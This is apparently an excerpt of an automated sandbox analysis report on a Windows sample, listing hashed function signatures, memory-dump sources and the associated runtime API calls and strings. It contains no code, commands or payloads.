                                                                                                          • Instruction Fuzzy Hash: 9BF0286A76830A0BD310DDFAADC456BB3E1D7D5214F194539E940E3341E4F8F80681A8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6715dbe9d135ac45bdbd9ac448563beeb8c9300e3d08683238c916d7afe545dc
                                                                                                          • Instruction ID: 7c963995ffd6ab337d9a695198e0a5d7bcf509792ecc366c678e3cf94aa25ffd
                                                                                                          • Opcode Fuzzy Hash: 6715dbe9d135ac45bdbd9ac448563beeb8c9300e3d08683238c916d7afe545dc
                                                                                                          • Instruction Fuzzy Hash: 3101443A3946018FD70CDF28E8A16FAB7A6E786300F0D543DC482C3221EA38E911C648
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2b88062f56769bb86136e5b0f9c197fa5aab20b91b17b8cecccb4b899e00228a
                                                                                                          • Instruction ID: df34008647d778bb7c521eae4ddccb3a733cd5fde321c9630a51ec9e0fc568b0
                                                                                                          • Opcode Fuzzy Hash: 2b88062f56769bb86136e5b0f9c197fa5aab20b91b17b8cecccb4b899e00228a
                                                                                                          • Instruction Fuzzy Hash: 2BB092E9C0B41086D015AB11BC024ABB0268913348F1424BAE80632282AA6AEA1E40DF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7b620c91a42edb0786d309cbcea9fd596892cbdb30a322ebafa140b7a14dfef1
                                                                                                          • Instruction ID: 86aa6f376ae128fac203354b731e992d447e72622e96fa66a5b9d7e17052ec8c
                                                                                                          • Opcode Fuzzy Hash: 7b620c91a42edb0786d309cbcea9fd596892cbdb30a322ebafa140b7a14dfef1
                                                                                                          • Instruction Fuzzy Hash: A7B09228AAC050C7920CCF24D8909B2B2BBDB87608A14B268D04B23226D220E802970C
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit
                                                                                                          • String ID: `$b$d$f$h$j$l$n$x$|$~
                                                                                                          • API String ID: 2610073882-2392625418
                                                                                                          • Opcode ID: d56210b6122cd0a81d0aed4da15e1541f510ecdfe567a2f287f30a5ea68c2328
                                                                                                          • Instruction ID: b79967f44f2bd9de6c2e39eb15a986492cae5a4b6d791275bc0e3f4af17e2b78
                                                                                                          • Opcode Fuzzy Hash: d56210b6122cd0a81d0aed4da15e1541f510ecdfe567a2f287f30a5ea68c2328
                                                                                                          • Instruction Fuzzy Hash: A4414A71208B818BD725CF3CC884646BFA2AB56224F18869CD8E54F3EAD3B9D415C762
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit
                                                                                                          • String ID: `$b$d$f$h$j$l$n$x$|$~
                                                                                                          • API String ID: 2610073882-2392625418
                                                                                                          • Opcode ID: 1ace8412bc45bfffb96bd3be78b6ed24615df238187204af6596b75391cea6f0
                                                                                                          • Instruction ID: d4354520380d8857094eb198d18f80dccd27335c0442324ae3d10dc815d509f5
                                                                                                          • Opcode Fuzzy Hash: 1ace8412bc45bfffb96bd3be78b6ed24615df238187204af6596b75391cea6f0
                                                                                                          • Instruction Fuzzy Hash: 7F413B70208B818FD725CF3CC894316BFE2AB56224F08869CE8E58F3D6C679D515C766
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressCloseFileHandleProcSize
                                                                                                          • String ID: CreateFileA
                                                                                                          • API String ID: 2836222988-1429953656
                                                                                                          • Opcode ID: 1941b09e9cc8073a9be47699593869403c3c2540d5a1a10f754cb863f2cbff5d
                                                                                                          • Instruction ID: 91baa2a37258f921140ddebc381fd2ba2dd5bcd4b2b7fedb82596daafc8be04b
                                                                                                          • Opcode Fuzzy Hash: 1941b09e9cc8073a9be47699593869403c3c2540d5a1a10f754cb863f2cbff5d
                                                                                                          • Instruction Fuzzy Hash: E741C3B09083498FDB00EFA8D4987AEBBF1EF49310F00852DE859AB351D7749549CF92
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Handle$AddressCloseCreateModuleObjectProcSingleThreadWait
                                                                                                          • String ID: FreeConsole$kernel32.dll
                                                                                                          • API String ID: 1580151904-2564406000
                                                                                                          • Opcode ID: 47faf96f0aceb55235ca9f6745d53d22279a70193cc71d30f317f3e2181cf2a0
                                                                                                          • Instruction ID: 2796f4e22746039ec1e910edd0490eeb8759645120122c13189ff44bb62eef80
                                                                                                          • Opcode Fuzzy Hash: 47faf96f0aceb55235ca9f6745d53d22279a70193cc71d30f317f3e2181cf2a0
                                                                                                          • Instruction Fuzzy Hash: 9021A8B09043499FDB40EFB8D98979EBBF1FB44300F40892DE8599B250EB749648CF92
                                                                                                          APIs
                                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,006E412D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 006E41E8
                                                                                                          • __alloca_probe_16.LIBCMT ref: 006E42A3
                                                                                                          • __alloca_probe_16.LIBCMT ref: 006E4332
                                                                                                          • __freea.LIBCMT ref: 006E437D
                                                                                                          • __freea.LIBCMT ref: 006E4383
                                                                                                          • __freea.LIBCMT ref: 006E43B9
                                                                                                          • __freea.LIBCMT ref: 006E43BF
                                                                                                          • __freea.LIBCMT ref: 006E43CF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                                          • String ID:
                                                                                                          • API String ID: 127012223-0
                                                                                                          • Opcode ID: a54d103f039e00812d2bbfc8ce6b06f7bc14217fff1f62af5129727ba533da8e
                                                                                                          • Instruction ID: 67e2f6273e195eea468e57f86b657494f05805c0a83859fc58e270b2f959a82b
                                                                                                          • Opcode Fuzzy Hash: a54d103f039e00812d2bbfc8ce6b06f7bc14217fff1f62af5129727ba533da8e
                                                                                                          • Instruction Fuzzy Hash: 6871C1329013859ADF20AEB68C41FFE77ABAF49350F290159F914EB381EF759D0087A4
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 3213747228-0
                                                                                                          • Opcode ID: 72974dffd406f4600ff762acc25dc65bf06a15d61c9fdd7785344ebde1d75b22
                                                                                                          • Instruction ID: 6b363523dc4633402371d2f35a00bd64e81b204f7cd28d4ad2eee28e62d97940
                                                                                                          • Opcode Fuzzy Hash: 72974dffd406f4600ff762acc25dc65bf06a15d61c9fdd7785344ebde1d75b22
                                                                                                          • Instruction Fuzzy Hash: 03B16632D013969FDB218F68CC85BFE7BA6EF59350F14416AE904AB382DA749D01C7A0
                                                                                                          APIs
                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 006D4ADB
                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 006D4D54
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                                          • String ID: csm$csm$csm$xfn
                                                                                                          • API String ID: 2673424686-305129718
                                                                                                          • Opcode ID: 972bc72f9680d1d0acda0d28aac94c71d5d166d6e869f42e4fcebf1c3312a9ab
                                                                                                          • Instruction ID: a033ce138899878234963caf1e0fab75f74c859d8313aee410f07890b9d52334
                                                                                                          • Opcode Fuzzy Hash: 972bc72f9680d1d0acda0d28aac94c71d5d166d6e869f42e4fcebf1c3312a9ab
                                                                                                          • Instruction Fuzzy Hash: 85B14471C01219EBCF28DFA4C8819AEBBB6FF14310B14416BE9116B316DB71DE51CBA5
                                                                                                          APIs
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006CAC47
                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 006CAC4F
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006CACD8
                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 006CAD03
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006CAD58
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                          • Opcode ID: d5fc88ff79d1b2f708a75e234919b8aab431ffc0568431a948a8a028a80d05a2
                                                                                                          • Instruction ID: 19b2a1f84b8328c17191ec5ebc1fb50a983422959f29f545855829ae820d2cee
                                                                                                          • Opcode Fuzzy Hash: d5fc88ff79d1b2f708a75e234919b8aab431ffc0568431a948a8a028a80d05a2
                                                                                                          • Instruction Fuzzy Hash: 6141A230E0021C9BCF10EFA8C885EAE7BA3EF45318F14815AE8159B352D735AE15CBD6
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,006D63C1,00000000,00000000,00000000,00000000), ref: 006D6373
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                          • API String ID: 3664257935-537541572
                                                                                                          • Opcode ID: dd12038cf5e1147218962d83901b3fee0cf8660f8473c434a715f9ed31d21b6b
                                                                                                          • Instruction ID: 7582bc0679f4c94040c23d1eac16d609c1203fd6d8bb6a84ef2ad1279e6bff75
                                                                                                          • Opcode Fuzzy Hash: dd12038cf5e1147218962d83901b3fee0cf8660f8473c434a715f9ed31d21b6b
                                                                                                          • Instruction Fuzzy Hash: FD21EB31E01214E7D7219B65DC45AEE375BAB527A0F162226FD16AB3D1D731ED00C6E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 96279efcac15d412328f18677dc6f0c0d04848db0c2b776ad7dbb28d38857621
                                                                                                          • Instruction ID: 687477f443cda2c1ef3a684553add0255c1ddabca16d3566bedc93ee035329ff
                                                                                                          • Opcode Fuzzy Hash: 96279efcac15d412328f18677dc6f0c0d04848db0c2b776ad7dbb28d38857621
                                                                                                          • Instruction Fuzzy Hash: F8B10170E0139AAFDB11DF5AC895BFD7BB7AF16310F144249E411AB392C7B09A42CB60
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(?,?,006D40D3,006CA9DD,006C9C34), ref: 006D40EA
                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006D40F8
                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006D4111
                                                                                                          • SetLastError.KERNEL32(00000000,006D40D3,006CA9DD,006C9C34), ref: 006D4163
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3852720340-0
                                                                                                          • Opcode ID: 69449f94724db45ad2d8ba12ce1ca990fac870c24a9da5b62d6d560353e63d2a
                                                                                                          • Instruction ID: a8a41959641f969de0ac97b16e5550582cdad4e6dc1e876967de5bda046e0e9a
                                                                                                          • Opcode Fuzzy Hash: 69449f94724db45ad2d8ba12ce1ca990fac870c24a9da5b62d6d560353e63d2a
                                                                                                          • Instruction Fuzzy Hash: 9801D432A0A3165FB7642B74BCC65B72697DB62375B20123FF520A53F2FEA24C41D684
                                                                                                          APIs
                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,006E56A4,000000FF,?,006CF319,006CF200,?,006CF3B5,00000000), ref: 006CF28D
                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006CF29F
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,006E56A4,000000FF,?,006CF319,006CF200,?,006CF3B5,00000000), ref: 006CF2C1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                          • Opcode ID: dca1e3b166d4bcb833ac2eeacb15dbd2bfe53e3a063bd4eecf7ab0196ba29901
                                                                                                          • Instruction ID: 31f0ec6dfd76a9be7a3c6e01d40a4ac6a9884729d189ad57deff91857f852d54
                                                                                                          • Opcode Fuzzy Hash: dca1e3b166d4bcb833ac2eeacb15dbd2bfe53e3a063bd4eecf7ab0196ba29901
                                                                                                          • Instruction Fuzzy Hash: 5301A236940795ABDB018F80CC45FFEBBBAFB04B15F00062AFC12A62A0DB759900CA80
                                                                                                          APIs
                                                                                                          • __alloca_probe_16.LIBCMT ref: 006D6B1F
                                                                                                          • __alloca_probe_16.LIBCMT ref: 006D6BE8
                                                                                                          • __freea.LIBCMT ref: 006D6C4F
                                                                                                            • Part of subcall function 006D5361: HeapAlloc.KERNEL32(00000000,006D72E5,?,?,006D72E5,00000220,?,?,?), ref: 006D5393
                                                                                                          • __freea.LIBCMT ref: 006D6C62
                                                                                                          • __freea.LIBCMT ref: 006D6C6F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1096550386-0
                                                                                                          • Opcode ID: 017f33c651c643d6bb3d23c77a6e6dbeb78e76857627223e949bccb131e362e5
                                                                                                          • Instruction ID: 9c7e242b89285c7061b3d002a07f5b4f0cfd808715befe883f654b6ad7402c0e
                                                                                                          • Opcode Fuzzy Hash: 017f33c651c643d6bb3d23c77a6e6dbeb78e76857627223e949bccb131e362e5
                                                                                                          • Instruction Fuzzy Hash: 1151B272A10206AFEB205FA5CC85EFB76ABEF44B50F19002EFD45D6351EB71DC1096A4
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 006C7859
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006C7864
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006C78D2
                                                                                                            • Part of subcall function 006C774F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 006C7767
                                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 006C787F
                                                                                                          • _Yarn.LIBCPMT ref: 006C7895
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                          • String ID:
                                                                                                          • API String ID: 1088826258-0
                                                                                                          • Opcode ID: 71fc25e41a1f8c1056146debabbbb326db208cef5b153fec13cd972151857ec4
                                                                                                          • Instruction ID: ef7a70199d41bc448de90bbac322d765599dd1449cf1f69fcff2d508b12e204e
                                                                                                          • Opcode Fuzzy Hash: 71fc25e41a1f8c1056146debabbbb326db208cef5b153fec13cd972151857ec4
                                                                                                          • Instruction Fuzzy Hash: 9301BCB5A056149BCB46EF20C849A7C7B63FF95380B14041DE8025B382CF34AE06CFD9
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID: !$0$#v
                                                                                                          • API String ID: 3664257935-3002211246
                                                                                                          • Opcode ID: a59b02c1f9b8175dae2b6d0af442bdd73a96467c1f50dfe658eb48a36293ef53
                                                                                                          • Instruction ID: 363f3f82d949639bcd6d0eea56e432ff8ce25dbbcf70693a7459fa4f30c8f00e
                                                                                                          • Opcode Fuzzy Hash: a59b02c1f9b8175dae2b6d0af442bdd73a96467c1f50dfe658eb48a36293ef53
                                                                                                          • Instruction Fuzzy Hash: 77816C31A083908AD728CF29944177FFFE2AFD6304F28466ED4D59B391C67C8945C75A
                                                                                                          APIs
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,006DF65D,00000000,?,006F1E18,?,?,?,006DF594,00000004,InitializeCriticalSectionEx,006E90D4,006E90DC), ref: 006DF5CE
                                                                                                          • GetLastError.KERNEL32(?,006DF65D,00000000,?,006F1E18,?,?,?,006DF594,00000004,InitializeCriticalSectionEx,006E90D4,006E90DC,00000000,?,006D500C), ref: 006DF5D8
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 006DF600
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                          • String ID: api-ms-
                                                                                                          • API String ID: 3177248105-2084034818
